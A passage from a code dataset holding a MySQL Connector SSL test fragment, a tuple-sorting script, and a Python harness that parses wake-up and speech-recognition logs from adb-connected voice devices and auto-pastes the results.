os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'),\n 'key': os.path.join(tests.SSL_DIR, 'tests_client_key.pem'),\n}\n\nOPTION_FILE = os.path.join('tests', 'data', 'option_files', 'my.cnf')\n\nclass Bug21879914(tests.MySQLConnectorTests):\n\n def test_ssl_cipher_in_option_file(self):\n config = tests.get_mysql_config()\n config['ssl_ca'] = TEST_SSL['ca']\n config['use_pure'] = False\n config.pop('unix_socket')\n\n cnx = mysql.connector.connect(**config)\n cnx.cmd_query(\"SHOW STATUS LIKE 'Ssl_cipher'\")\n self.assertNotEqual(cnx.get_row()[1], '') # Ssl_cipher must have a value\n","sub_path":"external/mysql/mysql-connector-python-8.0.11/tests/issues/test_bug21879914.py","file_name":"test_bug21879914.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"531693013","text":"# Function to sort the list of tuples by its last item \r\ndef sortTuple(tup):\r\n\t\r\n\t# Checking last element type for sorting\r\n\tchar = tup[0][-1]\r\n\r\n\t# Handling Integer Last Element for sorting\r\n\tif char.isdigit():\r\n\t\ttup.sort(key = lambda x: int(x[-1].replace('\\'','')))\r\n\r\n\t# Handling String Last Element (irrespective of case) for sorting\r\n\telse:\r\n\t\ttup.sort(key = lambda x: x[-1].lower()) \r\n\r\n\treturn tup\r\n\r\n\r\n# User Tuple Input\r\ni = input(\"Enter List Of Tuples\")\r\n\r\nl = []\r\n\r\n# Creating List of Tuples\r\nfor tup in i.split('),('):\r\n\ttup = tup.replace(')','').replace('(','')\r\n\ttup = tup.replace('\\'','')\r\n\tl.append(tuple(tup.split(',')))\r\n\r\n# Driver Code\r\nprint(sortTuple(l))\r\n\r\n\r\n# Sample Test Cases\r\n''' \r\n\r\n\t('abcd','hi',5),('bacd','hi',10),('cabd','hi',9),('dacb','hi',20),('aabc','hi',6),('bacc','hi',18)\r\n\t(5,'hi','abcd'),(10,'hi','Bacd'),(9,'hi','cabd'),(20,'hi','dacb'),(6,'hi','Aabc'),(18,'hi','bacc')\r\n\r\n'''","sub_path":"Python/tuple_sort.py","file_name":"tuple_sort.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648192042","text":"# -*- coding: utf-8-*-\nimport ast\nimport os\nimport queue\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport psutil as psutil\nfrom pykeyboard import PyKeyboard\n\nk = PyKeyboard()\nQueue = queue\nL = threading.Lock()\n\n\ndef set_clipboard_text(_t):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(_t.encode('utf-8'))\n p.stdin.close()\n p.communicate()\n time.sleep(.03)\n\n\ndef paste():\n k.press_key('Command')\n k.tap_key('v')\n time.sleep(0.03)\n k.release_key('Command')\n\n\ndef click(n):\n time.sleep(.03)\n k.tap_key(n)\n time.sleep(.03)\n\n\ndef auto_set(_text, _sn):\n global L\n if only_wakeup:\n return\n L.acquire()\n try:\n _as(_text, _sn)\n except Exception as e1:\n print(repr(e1))\n L.release()\n\n\ndef _as(_text, _sn):\n print(_text + '\\t' + _sn)\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n if ('text' + d) not in DATA:\n return\n if DATA['text' + d] == '':\n return\n\n for s in range(len(ACTIVE_DEVICES)):\n s = str(s)\n set_clipboard_text(DATA['text' + s])\n paste()\n time.sleep(0.03)\n click('Tab')\n time.sleep(0.03)\n set_clipboard_text(DATA['sn' + s])\n time.sleep(0.03)\n paste()\n time.sleep(0.03)\n if int(s) == len(ACTIVE_DEVICES) - 1:\n click('Return')\n time.sleep(0.03)\n else:\n click('Tab')\n time.sleep(0.03)\n # for e in range(len(ACTIVE_DEVICES)):\n # k.press_key('Shift')\n # click(\"Tab\")\n # k.release_key('Shift')\n # time.sleep(0.03)\n # if int(e) != len(ACTIVE_DEVICES) - 1:\n # k.press_key('Shift')\n # click(\"Tab\")\n # k.release_key('Shift')\n # time.sleep(0.03)\n if write_rec:\n msg = ''\n for s in range(len(ACTIVE_DEVICES)):\n msg += DATA['text' + str(s)] + '\\t' + DATA['sn' + str(s)]\n if s + 1 != len(ACTIVE_DEVICES):\n msg += '\\t'\n t.save_memory(SAVE_RESULTS, msg + '\\r')\n\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n DATA['text' + d] = DATA['sn' + d] = ''\n\n\ndef write_wakeup(no):\n L.acquire()\n p = sys.argv[0].split('/')\n if only_wakeup:\n with open('/%s/%s/..wakeup' % (p[1], p[2]), 'a') as f:\n f.write(ACTIVE_DEVICES[int(no)] + '\\n')\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n DATA['text' + d] = DATA['sn' + d] = ''\n if ('wakeup_count' + no) in DATA:\n DATA['wakeup_count' + no] += 1\n else:\n DATA['wakeup_count' + no] = 1\n # if len(arg) > 0:\n # txt.txt_log.write(\n # str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '_' + str(arg[0]) + '\\r')\n #\n # elif ('wakeup_angle' + no) in DATA:\n # txt.txt_log.write(str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '_' + DATA[\n # 'wakeup_angle' + no] + '\\r')\n # else:\n # txt.txt_log.write(str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '\\r')\n print(ACTIVE_DEVICES[int(no)] + ' 唤醒次数: ' + str(DATA['wakeup_count' + no]))\n L.release()\n\n\nonly_wakeup = False\nwrite_rec = False\nis_save_log = False\nstop_self = False\nrestart_self = False\nSAVE_RESULTS = r'~/Desktop/res.log'\nSAVE_AUDIO = r'~/Desktop/audio'\ntd = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\nACTIVE_DEVICES = [] # 激活的设备\nCURRENT_MODULE = '小度在家' # 当前模式\nmods = []\nlogs = []\n\nMOD_AINEMO_LAUNCHER = '小度在家'\nMOD_AINEMO_DEMO = '小度在家demo'\nMOD_CW_LAUNCHER = '小维AI'\nMOD_CW_DEMO = '创维TV'\nMOD_HUAWEI_LAUNCHER = '华为'\nMOD_HUAWEI_DEMO = '华为demo'\nMOD_CW_BOX = '创维盒子'\nMOD_Max = 'Max'\nMOD_XIAODUBOX = '小度音箱'\nMOD_XGP = '小钢炮'\nMOD_CW_BOX_DEMO = '创维盒子demo'\nMOD_AINEMO_1S = '小度在家1S'\nMOD_AINEMO_1L_DEMO = '小度在家1L-demo'\nMOD_AINEMO_1C = '小度在家1C'\nMOD_KUANYANG = '宽洋'\nMOD_esp32 = 'esp32'\nMOD_DRIVER = '车机'\nMOD_VENUS = 'VENUS'\nMOD_CM = '创米盒子'\n\nMOD_LIST = [MOD_CW_DEMO,\n ]\n\nDATA = {}\n\n\nclass MODULE(object):\n def __init__(self):\n self.stime = ''\n self.num = 1\n\n def main_doing(self, _line, _module, no):\n if _module == MOD_CW_DEMO:\n self.module_chuangwei_demo(_line, no)\n elif _module == MOD_CW_LAUNCHER:\n self.module_chuangwei_launcher(_line, no)\n elif _module == MOD_HUAWEI_LAUNCHER:\n self.module_huawei_launcher(_line, no)\n elif _module == MOD_AINEMO_LAUNCHER:\n self.module_ainemo(_line, no)\n elif _module == MOD_AINEMO_DEMO:\n self.module_ainemo_demo(_line, no)\n elif _module == MOD_HUAWEI_DEMO:\n self.module_huawei2(_line, no)\n elif _module == MOD_CW_BOX:\n self.module_cw_box(_line, no)\n elif _module == MOD_CW_BOX_DEMO:\n self.module_cw_show_demo(_line, no)\n elif _module == MOD_XGP:\n self.module_xgp(_line, no)\n elif _module == MOD_XIAODUBOX:\n self.module_xdbox(_line, no)\n elif _module == MOD_Max:\n self.module_max(_line, no)\n elif _module == MOD_AINEMO_1S:\n self.module_ainemo_1s(_line, no)\n elif _module == MOD_AINEMO_1L_DEMO:\n self.module_ainemo_1l_demo(_line, no)\n elif _module == MOD_AINEMO_1C:\n self.module_ainemo_1c(_line, no)\n elif _module == MOD_KUANYANG:\n self.module_ky(_line, no)\n elif _module == MOD_esp32:\n self.module_ep(_line, no)\n elif _module == MOD_DRIVER:\n self.module_driver(_line, no)\n elif _module == MOD_VENUS:\n self.module_venus(_line, no)\n elif _module == MOD_CM:\n self.module_chuangmi(_line, no)\n\n @staticmethod\n def module_chuangmi(line, no):\n pass\n\n @staticmethod\n def module_venus(line, no):\n if '--------wakeup--------' in line:\n write_wakeup(no)\n if 'FinalAsrResult' in line:\n text = line[line.find('[\"') + 2: line.find('\"]')]\n sn = line[line.find('dlg_') + 4:-1]\n DATA['text' + no] = text\n DATA['sn' + no] = sn\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_driver(line, no):\n if line.find(\"wp.data\") != -1:\n if \"你好航小瓜\" not in line and \"你好魔方\" not in line and \"小可爱\" not in line:\n # print(line)2660875263. word\n rec_result = line.split(':')\n res = rec_result[8]\n wp_data = res.split('.')\n sid = \"\"\n wp = wp_data[0]\n print(wp)\n text = wp\n sn = sid\n res_final = text + ',' + sn\n DATA['text' + no] = text\n DATA['sn' + no] = sn\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ep(line, no):\n if 'status=1' in line:\n write_wakeup(no)\n elif 'asr result:' in line and 'corpus_no' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['result']['word'][0]\n sn = line['sn']\n corpus = str(line['corpus_no'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ky(line, no):\n if u'唤醒成功' in line:\n write_wakeup(no)\n elif '\\\"type\\\":\\\"FINAL\\\"' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['directive']['payload']['text']\n DATA['text' + no] = text\n DATA['sn' + no] = line['directive']['header']['dialogRequestId']\n auto_set(text, DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_1c(line, no):\n if 'wakeup_time' in line and 'wp.data' in line and 'WakeUpEngine' in line:\n write_wakeup(no)\n elif 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n elif 'Final result' in line:\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_1l_demo(line, no):\n if 'wakeup_time' in line and 'SpeechCallback' in line:\n write_wakeup(no)\n elif 'finalResult' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 小度在家1S\n @staticmethod\n def module_ainemo_1s(line, no):\n if 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n if 'wakeup_time' in line and 'result' in line:\n write_wakeup(no)\n elif 'final_result' in line and 'results_recognition' in line and (\n 'finalResult' in line or 'SpeechCallback' in line):\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维demo识别\n @staticmethod\n def module_chuangwei_demo(line, no):\n if line.find('wakeup_time') != -1 and 'wp.data' in line and 'result' in line:\n write_wakeup(no)\n # if line.find(\"ASREngine\") != -1 and line.find('origin_result') != -1 and line.find('corpus_no') != -1:\n # line = ast.literal_eval(line[line.find('{'):])\n # corpus = str(line['origin_result']['corpus_no'])\n # DATA['sn' + no] = corpus\n # elif line.find('--final') != -1:\n # text = line[line.find('final: ') + 7: -1]\n # DATA['text' + no] = text\n # auto_set(text, DATA['sn' + no])\n # elif line.find('wakeup_time') != -1 and line.find('result') != -1:\n # write_wakeup(no)\n elif 'finalResult' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维launcher识别\n @staticmethod\n def module_chuangwei_launcher(line, no):\n if 'name : wp.data' in line:\n write_wakeup(no)\n elif 'corpus_no' in line and 'response' in line and 'BDSHttpRequestMaker' in line:\n # print(line[:-1])\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['sn' + no] = line['sn'] + '_' + str(line['corpus_no'])\n elif 'onFinalReconnition' in line:\n text = line[line.rfind(': ') + 2:-1]\n DATA['text' + no] = text\n auto_set(text, DATA['sn' + no])\n\n # 华为产品包 识别\n @staticmethod\n def module_huawei_launcher(line, no):\n if line.find('SpeechCallback') != -1 and line.find('wakeup_time') != -1:\n write_wakeup(no)\n elif line.find(u'SpeechCallback') != -1 and line.find('final_result') != -1 and line.find('corpus') != -1:\n # print line\n line = ast.literal_eval(line[line.find('{'):])\n DATA['text' + no] = line['best_result']\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no'])\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 小鱼识别\n @staticmethod\n def module_ainemo(line, no):\n if 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n if 'wakeup_time' in line and 'SpeechCallback' in line:\n write_wakeup(no)\n elif 'final_result' in line and 'results_recognition' in line and (\n 'finalResult' in line or 'SpeechCallback' in line):\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_demo(line, no):\n if line.find('wakeup_time') != -1 and line.find('result') != -1:\n write_wakeup(no)\n # elif line.find(\"DCS-AsrEngine\") != -1 and line.find('logid') != -1:\n # logid = line[line.find('logid') + 8:line.find('client_ip') - 3]\n # print logid\n # DATA['sn' + no] = logid\n elif line.find('final') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n sn = line['origin_result']['sn']\n corpus = str(line['origin_result']['corpus_no'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 华为demo\n @staticmethod\n def module_huawei2(line, no):\n if line.find('wakeup_time') != -1 and line.find('result') != -1:\n write_wakeup(no)\n elif line.find('Final result:') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no'])\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维box\n def module_cw_box(self, line, no):\n if line.find(\"wakeup_time\") != -1 and line.find(\"result\") != -1:\n write_wakeup(no)\n # self.stime = time.time()\n # elif 'asr.end' in line:\n # dur = float(time.time() - self.stime)\n # if dur <= 5.0:\n # print('提前截断' + str(self.num))\n # self.num += 1\n # time.sleep(1.5)\n # d.click(0.136, 0.817)\n # elif line.find('final_result') != -1 and line.find('finalResult') != -1:\n elif 'final_result' in line and 'AsrEngine' in line and 'asrEventListener' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n self.num -= 1\n\n @staticmethod\n def module_cw_show_demo(line, no):\n # if line.find('BDSHttpRequestMaker') != -1 and line.find('corpus_no') != -1 and line.find('response') != -1:\n # line = line[line.find('{'):line.rfind('}') + 1]\n # line = ast.literal_eval(line)\n # sn = line[\"sn\"]\n # corpus = str(line['corpus_no'])\n # if 'osn' not in DATA:\n # DATA['osn'] = ''\n # if sn != DATA['osn']:\n # DATA['osn'] = sn\n # DATA['sn' + no] = sn + '_' + corpus\n if line.find('wakeup_time') != -1 and line.find('SpeechCallback') != -1:\n write_wakeup(no)\n elif line.find('Final result') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = str(line['origin_result']['sn'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n def module_xgp(self, line, no):\n self.module_xdbox(line, no)\n\n @staticmethod\n def module_xdbox(line, no):\n # 小钢炮\n if 'wakeup trigger' in line:\n write_wakeup(no)\n elif 'kwd_detect' in line:\n write_wakeup(no)\n elif ('Final result' in line and 'results_recognition' in line) or 'result=asr' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n elif (' asr finish' in line and 'm_isRunning' not in line) or (\n 'Final result' in line and 'results_recognition' not in line):\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['result']['word'][0]\n corpus = str(line['corpus_no'])\n sn = line['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # audio:\n # if line.find('kwd_detect') != -1:\n # write_wakeup(no)\n # elif line.find('Final result') != -1:\n # line = ast.literal_eval(line[line.find('{'):])\n # text = line['result']['word'][0]\n # corpus = str(line['corpus_no'])\n # sn = str(line['sn'])\n # DATA['text' + no] = text\n # DATA['sn' + no] = sn + \"_\" + corpus\n # auto_set(DATA['text' + no], DATA['sn' + no])\n # 度秘\n # if 'wakeup trigger' in line:\n # write_wakeup(no)\n # elif 'finish content' in line:\n # line = ast.literal_eval(line[line.find('{'):])\n # text = line['result']['word'][0]\n # corpus = str(line['corpus_no'])\n # sn = line['sn']\n # DATA['text' + no] = text\n # DATA['sn' + no] = sn + '_' + corpus\n # auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_max(line, no):\n if 'wakeup_time' in line and 'Activity04WakeupAndASR' in line:\n write_wakeup(no)\n elif u'SpeechCallback' in line and 'final_result' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = line['origin_result']['corpus_no']\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + str(corpus)\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n\nclass AsynchronousFileReader(threading.Thread):\n \"\"\"\n Helper class to implement asynchronous reading of a file\n in a separate thread. Pushes read lines on a queue to\n be consumed in another thread.\n \"\"\"\n\n def __init__(self, fd, q):\n assert isinstance(q, Queue.Queue)\n assert callable(fd.readline)\n threading.Thread.__init__(self)\n self._fd = fd\n self._queue = q\n\n def run(self):\n \"\"\"The body of the tread: read lines and put them on the queue.\"\"\"\n for line in iter(self._fd.readline, ''):\n self._queue.put(line)\n\n def eof(self):\n \"\"\"Check whether there is no more content to expect.\"\"\"\n return not self.is_alive() and self._queue.empty()\n\n\ndef consume(command, no):\n \"\"\"\n Example of how to consume standard output and standard error of\n a subprocess asynchronously without risk on deadlocking.\n \"\"\"\n global L, stop_self\n time.sleep(float(no) / 10.0 * 3)\n td[int(no)] = time.time()\n # Launch the command as subprocess.\n process = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n shell=True)\n # Launch the asynchronous readers of the process' stdout and stderr.\n stdout_queue = Queue.Queue()\n stdout_reader = AsynchronousFileReader(process.stdout, stdout_queue)\n stdout_reader.start()\n stderr_queue = Queue.Queue()\n stderr_reader = AsynchronousFileReader(process.stderr, stderr_queue)\n stderr_reader.start()\n # Check the queues if we received some output (until there is nothing more to get).\n # frame.txt_log.write(('No%s_' % str(int(no) + 1)) + ACTIVE_DEVICES[int(no)] + u' <<<开始>>>' + '\\r')\n print(('No%s_' % str(int(no) + 1)) + ACTIVE_DEVICES[int(no)] + u' <<<开始>>>' + '\\r')\n mod = MODULE()\n cm = mods[int(no)]\n while not stdout_reader.eof() or not stderr_reader.eof():\n if stop_self or restart_self:\n break\n while not stdout_queue.empty():\n line = stdout_queue.get().decode(\"utf-8\", errors=\"ignore\")\n try:\n if is_save_log:\n logs[int(no)].write(line)\n mod.main_doing(line, cm, no)\n except Exception as e1:\n print('\\033[1;31m错误: ' + repr(e1) + '\\033[0m')\n # frame.txt_log.write(repr(e))\n while not stderr_queue.empty():\n line = stderr_queue.get().decode('utf-8')\n if 'has been replaced' in line or 'EOF' in line or line is None:\n continue\n print('\\033[1;31m错误: 设备-' + ACTIVE_DEVICES[int(no)] + str(line) + '\\033[0m')\n stop_self = True\n break\n # Sleep a bit before asking the readers again.\n time.sleep(.1)\n if is_save_log:\n logs[int(no)].close()\n process.kill()\n if no == '0':\n if stop_self:\n time.sleep(.5)\n t.kill_self()\n elif restart_self:\n print('\\n\\033[1;31m=======停止=======\\033[0m')\n time.sleep(.3)\n start_main()\n # Let's be tidy and join the threads we've started.\n # stdout_reader.join()\n # stderr_reader.join()\n # Close subprocess' file descriptors.\n # process.stdout.close()\n # process.stderr.close()\n\n # process.kill()\n # kill_self()\n\n\ndef get_device_list():\n device_sn_list = []\n m_file = os.popen(\"adb devices\")\n for line in m_file.readlines():\n # line = line.encode('utf-8')\n if line.find(\"List of devices attached\") != -1 or line.find('start') != -1 or line.find('daemon') != -1:\n continue\n elif len(line) > 5:\n device_sn_list.append(line.split(\"\\t\")[0])\n m_file.close()\n return device_sn_list\n\n\nclass ThreadLogcat(threading.Thread):\n\n def __init__(self, no):\n threading.Thread.__init__(self)\n self.no = no\n self.start()\n\n def run(self):\n global DATA, CURRENT_MODULE\n DATA = {}\n # _start_d = get_device_list()[CURRENT_DEVICE]\n _d = ACTIVE_DEVICES[self.no]\n CURRENT_MODULE = mods[self.no]\n if CURRENT_MODULE == MOD_XIAODUBOX:\n res = os.popen('ssh root@%s ls /tmp | grep speech' % _d).readlines()[0][:-1]\n consume('ssh root@%s tail -F /tmp/%s' % (_d, res), str(self.no))\n elif CURRENT_MODULE == MOD_XGP:\n consume('adb -s %s shell tail -F /tmp/speechsdk.log' % _d, str(self.no))\n elif CURRENT_MODULE == MOD_esp32:\n consume('tail -F %s' % sys.argv[self.no + 1], str(self.no))\n else:\n os.popen('adb -s %s logcat -c' % _d).close()\n consume(\"adb -s %s logcat -v time\" % _d, str(self.no))\n\n\nclass Tools(object):\n\n def __init__(self):\n self.finish_count = 0\n self.audio_path = 'audio'\n\n @staticmethod\n def save_full_log(no):\n p = sys.argv[0].split('/')\n dev = ACTIVE_DEVICES[int(no)]\n log_path = '/%s/%s/Desktop/audio/%s/%s.txt' % (p[1], p[2], dev, dev)\n if not os.path.exists(log_path[:log_path.rfind('/')]):\n os.makedirs(log_path[:log_path.rfind('/')])\n f = open(log_path, 'a')\n return f\n\n def pull_audio(self, dir_name):\n global CURRENT_MODULE\n DATA.clear()\n self.finish_count = 0\n print('\\033[1;36m音频导出中......\\033[0m\\n')\n dir_name = dir_name.split(' ')\n if len(dir_name) == 1:\n dir_name = 'audio'\n else:\n dir_name = dir_name[1]\n self.audio_path = dir_name\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n p = sys.argv[0].split('/')\n save_path = '/%s/%s/Desktop/audio/%s/%s' % (p[1], p[2], dev, dir_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n if CURRENT_MODULE in (MOD_AINEMO_DEMO, MOD_AINEMO_LAUNCHER):\n from_path = '/data/log/'\n elif CURRENT_MODULE in (MOD_AINEMO_1S, MOD_AINEMO_1C, MOD_AINEMO_1L_DEMO):\n from_path = 'mnt/aud_rec/'\n elif CURRENT_MODULE in (MOD_HUAWEI_DEMO, MOD_HUAWEI_LAUNCHER, MOD_CW_LAUNCHER, MOD_CW_DEMO):\n from_path = '/data/local/tmp/aud_rec/'\n elif CURRENT_MODULE in (MOD_CW_BOX, MOD_CW_BOX_DEMO, MOD_Max, MOD_VENUS):\n from_path = '/data/local/aud_rec/'\n else:\n print('\\n\\033[1;31m该设备不支持\\033[0m')\n self.finish_count += 1\n if self.finish_count == len(ACTIVE_DEVICES):\n print('\\033[1;36m\\n导出完毕\\033[0m\\n')\n self.savelog_after_move()\n continue\n cmd = 'adb -s %s pull %s %s' % (dev, from_path, save_path)\n threading.Thread(target=self.__pull, args=(cmd, dev)).start()\n\n def __pull(self, cmd, dev):\n sp = subprocess.Popen(cmd, shell=True,\n stdout=subprocess.PIPE)\n for line in iter(sp.stdout.readline, ''):\n line = line.decode()[:-1]\n if 'No such file or directory' in line:\n print('\\n\\033[1;31m设备 %s 没有音频\\033[0m' % dev)\n self.finish_count += 1\n break\n if line == '':\n self.finish_count += 1\n break\n print(line, end='\\r')\n sp.kill()\n if self.finish_count == len(ACTIVE_DEVICES):\n print('\\033[1;36m\\n导出完毕\\033[0m\\n')\n self.savelog_after_move()\n\n def savelog_after_move(self):\n if is_save_log:\n ls = t.log()\n for l in ls:\n np = l.name[:l.name.rfind('/') + 1] + self.audio_path + '/' + l.name[l.name.rfind('/') + 1:]\n os.rename(l.name, np)\n t.log()\n\n @staticmethod\n def restart_app():\n global CURRENT_MODULE\n DATA.clear()\n activities = {\n MOD_CW_LAUNCHER: 'com.skyworth.lafite.srtnj.speechserver/'\n 'com.skyworth.lafite.srtnj.setting.SkyLafiteSettingHomeActivity',\n MOD_HUAWEI_LAUNCHER: 'com.baidu.launcher/com.baidu.duer.home.activity.HomeActivity',\n MOD_HUAWEI_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWakeupAndAsr',\n MOD_Max: 'com.baidu.muses.vera/none',\n MOD_CW_BOX: 'com.baidu.muses.vera/none',\n MOD_AINEMO_LAUNCHER: 'vulture.app.home/vulture.app.home.HomeActivity',\n MOD_AINEMO_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityMain',\n MOD_CW_BOX_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWakeupAndAsr',\n MOD_AINEMO_1S: 'com.baidu.launcher/com.baidu.duershow.launcher.home.ui.activity.HomeActivity',\n MOD_AINEMO_1L_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWPASREvent',\n MOD_AINEMO_1C: 'com.baidu.launcher/com.baidu.duershow.launcher.home.ui.activity.HomeActivity',\n MOD_VENUS: 'com.baidu.spil.e2edueros/copen om.baidu.spil.e2edueros.ShowInfoActivity'\n }\n\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n if CURRENT_MODULE in activities.keys():\n print('\\033[1;36m重启APP\\033[0m\\n')\n if CURRENT_MODULE in (MOD_AINEMO_LAUNCHER,):\n os.popen('adb -s %s shell rm data/log/*.raw' % dev).close()\n os.popen('adb -s %s shell rm data/log/logcat_full.log.*' % dev).close()\n stop = 'adb -s %s shell am force-stop %s 2>/dev/null' % (dev, activities[CURRENT_MODULE].split('/')[0])\n if not activities[CURRENT_MODULE].endswith('none'):\n start = 'adb -s %s shell am start %s 2>/dev/null' % (dev, activities[CURRENT_MODULE])\n os.popen(stop).close()\n os.popen(start).close()\n else:\n print('\\n\\033[1;31m该设备不支持\\033[0m')\n\n @staticmethod\n def reboot_dev():\n global CURRENT_MODULE\n print('\\033[1;36m设备重启\\033[0m\\n')\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n if CURRENT_MODULE == MOD_XIAODUBOX:\n threading.Thread(target=lambda: os.popen('ssh root@%s reboot' % dev).close()).start()\n else:\n threading.Thread(target=lambda: os.popen('adb -s %s reboot' % dev).close()).start()\n\n @staticmethod\n def kill_self():\n print('\\n\\033[1;31m=======退出=======\\033[0m')\n pids = psutil.pids()\n for pid in pids:\n if psutil.Process(pid).name() in sys.argv[0]:\n psutil.Process(pid).kill()\n\n @staticmethod\n def select_mod(_index=-1):\n if _index == -1:\n return len(MOD_LIST)\n _index = int(_index)\n if _index >= len(MOD_LIST) or _index < 0:\n raise IndexError\n return MOD_LIST[_index]\n\n def 